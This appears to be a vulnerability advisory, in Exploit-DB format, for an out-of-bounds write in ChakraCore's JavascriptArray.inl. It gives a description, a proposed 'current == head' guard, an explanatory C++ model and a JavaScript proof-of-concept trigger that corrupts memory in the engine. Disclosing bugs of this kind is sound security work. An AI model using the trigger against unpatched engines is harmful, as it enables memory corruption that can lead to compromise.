Vendor: N/A
By: John Doe
CVSS: 9.8 (HIGH)
CWE: 787 (Out-of-bounds write)
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

Out-of-bounds write in JavascriptArray.inl

The 'ScanForMissingValues' method operates on the array's 'head' segment, but the caller does not check that the grown segment 'current' is equal to 'head' before calling it. When the two differ, the scan is run with indices that belong to a different segment, which can lead to an out-of-bounds write.

Mitigation:

Check that the grown segment 'current' is equal to 'head' before calling 'ScanForMissingValues'.
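To make the missing guard concrete, here is a small model of the segment bookkeeping around AppendLeftOverItemsFromEndSegment. This is an added example, not ChakraCore's code: the Segment and Array layouts, the NaN sentinel for a missing value, the Outcome enum and the Run helpers are all assumptions chosen for illustration. The scan reports an index overrun instead of touching memory past the backing store, so the difference between the unguarded call and the 'current == head' check from the mitigation above is visible as a return value.

```cpp
#include <cmath>
#include <cstdint>
#include <limits>
#include <vector>

// Added example, not ChakraCore's code: a deliberately small model of the
// segment bookkeeping around AppendLeftOverItemsFromEndSegment, built to show
// why ScanForMissingValues must only run when the grown segment is `head`.
// Names, layout and the sentinel value below are assumptions.

// Stand-in for the engine's "missing value" marker (assumption).
static const double kMissing = std::numeric_limits<double>::quiet_NaN();

struct Segment {
    uint32_t left;                  // array index of elements[0]
    uint32_t length;                // elements in use
    std::vector<double> elements;   // backing store; size() is the capacity
    Segment(uint32_t l, uint32_t len, double fill)
        : left(l), length(len), elements(len, fill) {}
    // Grow the backing store by `growby` slots (stands in for GrowByMin).
    void GrowBy(uint32_t growby) {
        elements.resize(elements.size() + growby, kMissing);
    }
};

struct Array {
    Segment* head;                  // first segment; the scan only ever looks here
    bool hasNoMissingValues = true;
};

enum class Outcome { ScanInBounds, ScanSkipped, ScanOutOfBounds };

// Scans head->elements[start..end] for missing values. Where the unguarded
// original would index past the backing store, this model reports it instead.
static Outcome ScanForMissingValues(Array& arr, uint32_t start, uint32_t end,
                                    bool& foundMissing) {
    foundMissing = false;
    if (end >= arr.head->elements.size()) return Outcome::ScanOutOfBounds;
    for (uint32_t i = start; i <= end; ++i) {
        if (std::isnan(arr.head->elements[i])) { foundMissing = true; break; }
    }
    return Outcome::ScanInBounds;
}

// Appends endSeg's items onto `current`, then rescans the new slots.
// `guarded` selects the `current == head` check proposed as the mitigation.
static Outcome AppendLeftOverItems(Array& arr, Segment* current,
                                   const Segment& endSeg, bool guarded) {
    uint32_t endIndex = current->length - 1;      // last used index in current
    uint32_t growby = endSeg.length;
    current->GrowBy(growby);
    for (uint32_t i = 0; i < growby; ++i)          // CopyArray equivalent
        current->elements[endIndex + 1 + i] = endSeg.elements[i];
    current->length += growby;

    bool scan = guarded ? (current == arr.head && arr.hasNoMissingValues)
                        : arr.hasNoMissingValues;
    if (!scan) return Outcome::ScanSkipped;
    bool missing = false;
    Outcome o = ScanForMissingValues(arr, endIndex + 1, endIndex + growby, missing);
    if (o == Outcome::ScanInBounds && missing) arr.hasNoMissingValues = false;
    return o;
}

// Scenario 1 (constructed): head holds one element, `current` is a later and
// much longer segment, so indices valid in `current` overrun `head`.
Outcome RunLaterSegment(bool guarded) {
    Segment head(0, 1, 1.1);
    Segment current(0x7777, 2000, 2.0);
    Segment endSeg(0x7777 + 2000, 4, 3.0);
    Array arr{&head};
    return AppendLeftOverItems(arr, &current, endSeg, guarded);
}

// Scenario 2 (constructed): the grown segment is `head` itself, so the scan
// is in bounds with or without the guard.
Outcome RunHeadGrown(bool guarded) {
    Segment head(0, 3, 1.1);
    Segment endSeg(3, 2, 3.0);
    Array arr{&head};
    return AppendLeftOverItems(arr, &head, endSeg, guarded);
}
```

Run with `guarded = false`, scenario 1 reports ScanOutOfBounds, which is the situation the advisory describes; with the guard it returns ScanSkipped, and scenario 2 scans in bounds either way because the grown segment is the head.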

Exploit-DB raw data:

/*
Here's a snippet of AppendLeftOverItemsFromEndSegment in JavascriptArray.inl.

growby = endSeg->length;
current = current->GrowByMin(recycler, growby);
CopyArray(current->elements + endIndex + 1, endSeg->length,
    ((Js::SparseArraySegment<T>*)endSeg)->elements, endSeg->length);
LinkSegments((Js::SparseArraySegment<T>*)startPrev, current);
if (HasNoMissingValues())
{
    if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
    {
        SetHasNoMissingValues(false);
    }
}

In the "ScanForMissingValues" method, it uses "head". But it doesn't check the grown segment "current" is equal to "head" before calling the method.
I guess it should be like:
if (current == head && HasNoMissingValues())
{
    if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
    {
        SetHasNoMissingValues(false);
    }
}
*/

function trigger() {
    let arr = [1.1];
    let i = 0;
    for (; i < 1000; i += 0.5) {
        arr[i + 0x7777] = 2.0;
    }

    arr[1001] = 35480.0;

    for (; i < 0x7777; i++) {
        arr[i] = 1234.3;
    }
}

for (let i = 0; i < 100; i++) {
    trigger();
}